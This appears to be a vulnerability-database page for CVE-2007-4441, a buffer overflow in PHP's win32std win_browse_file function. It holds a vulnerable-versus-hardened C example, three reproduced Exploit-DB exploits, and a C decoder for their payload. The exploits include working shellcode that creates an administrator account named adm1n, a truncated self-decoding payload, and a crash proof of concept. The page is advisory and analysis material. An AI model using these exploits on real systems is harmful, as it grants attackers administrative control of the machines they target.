CVE-2007-4441
Published 2007-08-21
Priority: P4 (22) · Severity: medium · CVSS 2.0 base score 4.6, vector AV:L/AC:L/Au:N/C:P/I:P/A:P (local access, low complexity, no authentication, partial confidentiality/integrity/availability impact)
Exploit: public exploit code available (three Exploit-DB entries, listed below)
EPSS: 1.52% (71.5th percentile), the estimated probability of in-the-wild exploitation within the next 30 days
Buffer overflow in php_win32std.dll in the win32std extension for PHP 5.2.0 and earlier allows context-dependent attackers to execute arbitrary code via a long string in the filename argument to the win_browse_file function.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php | php | <= 5.2.0 | — |
Two of the three Exploit-DB entries below target PHP 5.2.3, so the range is probably understated. The vulnerable code is php_win32std.dll, the PECL win32std extension for Windows, not the PHP core: on a given host the question is whether that extension is loaded (extension_loaded("win32std") returns true), not the interpreter version alone.
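The bug class in one picture, as an added example that is not the win32std source (this page does not reproduce the extension's code): a filename argument copied into a fixed stack buffer with no length check, next to the hardened form. The buffer size is an assumption drawn from the exploits below, which place their 4-byte return address at offset 24 + 115 + 121 = 260 of the filename, and 260 is MAX_PATH; the struct, the dialog stand-in and the function names are mine so the code builds and runs without Win32.

```c
/* Added illustration of the bug class behind CVE-2007-4441 (not the win32std
 * source). Assumption taken from the exploits on this page: the filename
 * argument is copied into a MAX_PATH-byte stack buffer and the saved return
 * address sits right above it at offset 260. No dialog is actually shown. */
#include <errno.h>
#include <stddef.h>
#include <string.h>

#ifndef MAX_PATH
#define MAX_PATH 260   /* Win32 value, defined here so the example builds anywhere */
#endif

/* Stand-in for the two OPENFILENAME fields that matter here. */
struct file_request {
    char  *lpstrFile;   /* buffer holding the default name; the dialog writes the result back into it */
    size_t nMaxFile;    /* size of that buffer */
};

/* Stand-in for GetOpenFileName(): all it requires is that the buffer be
 * NUL-terminated within nMaxFile. Returns 0 on success, -1 otherwise. */
static int open_dialog(const struct file_request *req)
{
    return memchr(req->lpstrFile, '\0', req->nMaxFile) ? 0 : -1;
}

/* VULNERABLE (assumed pattern): the PHP string is copied with no length check.
 * A 264-byte filename writes 4 bytes past szFile; with the saved return
 * address directly above the buffer those bytes become EIP on return, which is
 * exactly the layout the $BOMB / $RET exploit below relies on.
 * Shown for contrast; never feed it untrusted input. */
int browse_file_vulnerable(const char *filename)
{
    char szFile[MAX_PATH];
    strcpy(szFile, filename);                       /* unbounded copy */
    struct file_request req = { szFile, sizeof szFile };
    return open_dialog(&req);
}

/* HARDENED: take the PHP string as (pointer, length), because PHP strings are
 * binary-safe and carry their length; refuse anything that does not fit
 * together with the terminator, and refuse embedded NULs, which the C API
 * would silently truncate at, opening a different file than the script named. */
int browse_file_hardened(const char *filename, size_t filename_len)
{
    char szFile[MAX_PATH];

    if (filename_len >= sizeof szFile) {            /* 259 chars + NUL is the maximum */
        errno = ENAMETOOLONG;
        return -1;
    }
    if (memchr(filename, '\0', filename_len) != NULL) {
        errno = EINVAL;
        return -1;
    }
    memset(szFile, 0, sizeof szFile);               /* the dialog never sees stale stack bytes */
    memcpy(szFile, filename, filename_len);
    struct file_request req = { szFile, sizeof szFile };
    return open_dialog(&req);
}

/* Largest filename the hardened path accepts. */
size_t max_filename_len(void) { return MAX_PATH - 1; }
```

The length check comes before any write to the stack buffer, and the comparison is `>=` rather than `>` so the terminator is always accounted for; the two exploit sizes on this page, 264 and the 260-byte return-address offset, both fail it.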
No detection rules found.
Exploit-DB: PHP 5.2.3 - 'PHP_win32sti' Local Buffer Overflow (2) (exploitdb, 2007-08-22, CVE-2007-4441)
---
<?php
// "adm1n" [password]=>"netjackal"   (tail of the original header comment: the account the payload creates)
//
// Shellcode: jmp/call/pop puts the address of the embedded command line in EDX,
// NUL-terminates it (mov [edx+0x52], al with AL = 0), calls WinExec(cmd, 0) and
// then ExitProcess(0). Both calls go through `mov ebx, imm32; call ebx` with
// absolute kernel32 addresses, so the payload only works on one Windows build.
$SC=
"\xEB\x19\x5A\x31\xC0\x50\x88\x42\x52\x52\xBB\x6D\x13\x86".
"\x7C\xFF\xD3\xBB\xDA\xCD\x81\x7C\x31\xC0\x50\xFF\xD3\xE8".
"\xE2\xFF\xFF\xFF\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x63".
"\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x61\x64\x6D\x31".
"\x6E\x20\x6E\x65\x74\x6A\x61\x63\x6B\x61\x6C\x20\x2F\x61".
"\x64\x64\x26\x26\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67".
"\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72".
"\x61\x74\x6F\x72\x73\x20\x2F\x61\x64\x64\x20\x61\x64\x6D".
"\x31\x6E\x58";
// Embedded command (the trailing "X" is the byte that gets overwritten with NUL):
//   cmd.exe /c net user adm1n netjackal /add&&net localgroup Administrators /add adm1n
// Little-endian 0x0116E670: the address the author expected to hold a copy of the
// NOP sled. Only works on a target without ASLR.
$RET="\x70\xE6\x16\x01";
// 24 NOPs + 115 bytes of shellcode + 121 bytes of padding = 260, so $RET overwrites
// the saved return address at offset 260 and the whole argument is 264 bytes.
$BOMB=str_repeat("\x90",24).$SC.str_repeat("A",121).$RET;
// The third argument is the filename that overflows the fixed-size buffer (CVE-2007-4441).
win_browse_file(1,NULL,$BOMB,NULL,array( "*" => "*.*"));
?>
# milw0rm.com [2007-08-22]
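To see what that payload does without running it, here is an added C helper (mine, not part of the Exploit-DB entry) that rebuilds $BOMB byte for byte from the literals above and decodes it: it confirms the total length (264) and the offset at which $RET overwrites the saved return address (260), reads the little-endian return address, follows the jmp/call/pop trick to recover the embedded command line, and lists the absolute addresses loaded into EBX before each `call ebx`. The function names are mine; the bytes are the exploit's.

```c
/* Added analysis helper for exploit (2) above (not part of the Exploit-DB
 * entry). Rebuilds the filename argument exactly as $BOMB is assembled and
 * extracts what a responder or reverser wants: total length, offset and value
 * of the bytes that land on the saved return address, the kernel32 addresses
 * the shellcode calls, and the command line it runs. No Windows APIs are
 * called, so it builds and runs anywhere. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* $SC from the exploit, byte for byte (115 bytes). */
static const unsigned char SC[] =
    "\xEB\x19\x5A\x31\xC0\x50\x88\x42\x52\x52\xBB\x6D\x13\x86"
    "\x7C\xFF\xD3\xBB\xDA\xCD\x81\x7C\x31\xC0\x50\xFF\xD3\xE8"
    "\xE2\xFF\xFF\xFF\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x63"
    "\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x61\x64\x6D\x31"
    "\x6E\x20\x6E\x65\x74\x6A\x61\x63\x6B\x61\x6C\x20\x2F\x61"
    "\x64\x64\x26\x26\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67"
    "\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72"
    "\x61\x74\x6F\x72\x73\x20\x2F\x61\x64\x64\x20\x61\x64\x6D"
    "\x31\x6E\x58";
#define SC_LEN (sizeof SC - 1)

/* $RET from the exploit and the two str_repeat() counts. */
static const unsigned char RET[4] = { 0x70, 0xE6, 0x16, 0x01 };
#define NOP_SLED 24
#define PAD      121
#define BOMB_LEN (NOP_SLED + SC_LEN + PAD + sizeof RET)

static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* str_repeat("\x90",24) . $SC . str_repeat("A",121) . $RET ; returns bytes written. */
size_t build_bomb(unsigned char *out, size_t cap)
{
    if (cap < BOMB_LEN) return 0;
    memset(out, 0x90, NOP_SLED);
    memcpy(out + NOP_SLED, SC, SC_LEN);
    memset(out + NOP_SLED + SC_LEN, 'A', PAD);
    memcpy(out + NOP_SLED + SC_LEN + PAD, RET, sizeof RET);
    return BOMB_LEN;
}

/* Where in the filename argument the saved return address is overwritten, and with what. */
size_t   ret_offset(void) { return NOP_SLED + SC_LEN + PAD; }
uint32_t ret_value(void)  { return le32(RET); }

/* Follow the jmp / call / pop trick: EB rel8 at offset 0 jumps to an E8 rel32
 * whose return address (the byte right after it) is the start of the command
 * string, which the `pop edx` (5A) it calls back to picks up. The `88 42 disp8`
 * (mov [edx+disp8], al, AL = 0) between the pop and the call names the byte
 * that becomes the NUL terminator, i.e. the string length. Returns 1 on success. */
int locate_command(size_t *start, size_t *len)
{
    if (SC_LEN < 2 || SC[0] != 0xEB) return 0;
    size_t call_at = 2 + SC[1];
    if (call_at + 5 > SC_LEN || SC[call_at] != 0xE8) return 0;
    int32_t rel = (int32_t)le32(SC + call_at + 1);
    long pop_at = (long)call_at + 5 + rel;
    if (pop_at < 0 || (size_t)pop_at >= call_at || SC[pop_at] != 0x5A) return 0;
    for (size_t i = (size_t)pop_at; i + 2 < call_at; i++) {
        if (SC[i] == 0x88 && SC[i + 1] == 0x42) {
            *start = call_at + 5;
            *len = SC[i + 2];
            return *start + *len < SC_LEN;
        }
    }
    return 0;
}

/* Copy the embedded command line out as a C string; returns its length, 0 on failure. */
size_t command_string(char *out, size_t cap)
{
    size_t start, len;
    if (!locate_command(&start, &len) || len + 1 > cap) return 0;
    memcpy(out, SC + start, len);
    out[len] = '\0';
    return len;
}

/* Every `mov ebx, imm32` (opcode BB) in the code part of the shellcode. Each is
 * followed by `call ebx`, so these are absolute kernel32 addresses the author
 * hardcoded; by their calling pattern (two args, then one and no return) they
 * are WinExec and ExitProcess. The payload is bound to one Windows build. */
size_t mov_ebx_targets(uint32_t *out, size_t max)
{
    size_t start, len, n = 0;
    if (!locate_command(&start, &len)) return 0;
    for (size_t i = 0; i + 5 <= start && n < max; i++)
        if (SC[i] == 0xBB) { out[n++] = le32(SC + i + 1); i += 4; }
    return n;
}

int main(void)
{
    unsigned char bomb[512];
    char cmd[128];
    uint32_t t[4];
    size_t n = build_bomb(bomb, sizeof bomb);
    printf("filename argument: %zu bytes; saved return address overwritten at offset %zu with 0x%08X\n",
           n, ret_offset(), (unsigned)ret_value());
    if (command_string(cmd, sizeof cmd))
        printf("command line: %s\n", cmd);
    size_t k = mov_ebx_targets(t, 4);
    for (size_t i = 0; i < k; i++)
        printf("hardcoded call target #%zu: 0x%08X\n", i + 1, (unsigned)t[i]);
    return 0;
}
```

Build with `cc -std=c99 decode_bomb.c && ./a.out`. Two things worth noting from the output: the EBX values are absolute kernel32 addresses, so this exploit fails on any Windows build other than the one it was written against, and the `net user ... /add&&net localgroup Administrators` command line sits in the clear in the PHP source, so a simple file signature catches this variant but not the self-decoding payload of exploit (1) below.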
Exploit-DB: PHP 5.2.3 - 'PHP_win32sti' Local Buffer Overflow (1) (exploitdb, 2007-08-22, CVE-2007-4441)
---
<?php
/* (tail of the original header comment; the rest is not on this page)
7ffdf020 7c911005 7c9110ed 00000001 00000000
shoutz go to Kevin Finisterre
*/
if(!function_exists('win_browse_file')) {
die('win32std extension is not available');
}
// Self-decoding payload: it opens with the fnstenv/pop-EIP trick (d9 74 24 f4 / 58)
// followed by an XOR loop (31 50 0e ...), so everything after the decoder stub is
// encoded and the command it runs is not readable in the source. The literal is
// cut off below.
$shellcode=
"\x2b\xc9\xb1\x51\xba\xbb\xb2\xd5\x31\xda\xda\xd9\x74\x24\xf4".
"\x58\x31\x50\x0e\x83\xc0\x04\x03\xeb\xb8\x37\xc4\xf7\xd7\x5c".
"\x6a\xef\xd1\x5c\x8a\x10\x41\x28\x19\xca\xa6\xa5\xa7\x2e\x2c".
"\xc5\x22\x36\x33\xd9\xa6\x89\x2b\xae\xe6\x35\x4d\x5b\x51\xbe".
"\x79\x10\x63\x2e\xb0\xe6\xfd\x02\x37\x26\x89\x5d\xf9\x6d\x7f".
"\x60\x3b\x9a\x74\x59\xef\x79\x5d\xe8\xea\x09\xc2\x36\xf4\xe6".
"\x9b\xbd\xfa\xb3\xe8\x9e\x1e\x45\x04\x23\x33\xce\x53\x4f\x6f".
"\xcc\x02\x4c\x5e\x37\xa0\xd9\xe2\xf7\xa2\x9d\xe8\x7c\xc4\x01".
"\x5c\x09\x65\x31\xc0\x66\xe8\x0f\xf2\x9a\xa4\x7
Exploit-DB: PHP 5.2.0 (Windows x86) - 'PHP_win32sti' Local Buffer Overflow (exploitdb, 2007-08-18, CVE-2007-4441)
---
<?php
// [x] Risk: Local Buffer Overflow (Medium - High Risk)
// [x] Notes: EDX and EIP are able to be controlled and therefore
// have the potential to dictate program flow.
//
// [x] "Sangre, sonando, de rabia naci.." ("Blood, dreaming, born of rage..") "Who do you trust?"
//
// ==================================================================================
if ( !extension_loaded("win32std") )
{
die;
}
// Crash-only proof of concept: 264 NOP bytes in the filename argument overrun the
// fixed-size buffer and put 0x90909090 in the saved return address. The weaponized
// variants above use the same 264-byte length with their return address at offset 260.
win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );
?>
# milw0rm.com [2007-08-18]
No writeups or analysis indexed.